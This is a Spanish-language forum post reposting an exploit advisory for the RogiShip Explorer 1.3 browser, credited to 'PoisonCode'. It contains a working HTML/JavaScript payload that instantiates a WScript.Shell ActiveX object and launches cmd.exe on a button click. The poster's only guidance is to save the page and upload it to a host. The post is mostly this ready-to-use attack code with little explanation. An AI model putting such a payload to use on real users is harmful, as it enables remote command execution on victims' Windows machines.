RogiShip Explorer 1.3 Remote Code Execution
Publicado: 14 Sep 2010, 16:17
Facil de entenderlo
Saludos
Código: Seleccionar todo
===================================
RogiShip Explorer 1.3 Remote Code Execution
===================================
# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title: RogiShip Explorer 1.3
# Software Link:http://www.softpedia.com/get/Internet/Browsers/RogiShip-Explorer.shtml
# Version: 1.3
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()
_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/
Exploit
---------------------------------------------------------
Lo guardamos y subimos a un host y listo
<script>
function go() {
w = new ActiveXObject("WScript.Shell");
w.run('cmd.exe');
return true;
}
</script>
<form>
<h1>Abrir Cmd Pwned by PoisonCode</h1>
<input type="button" value="Pwned"
onClick="return go()">
</form>
Saludos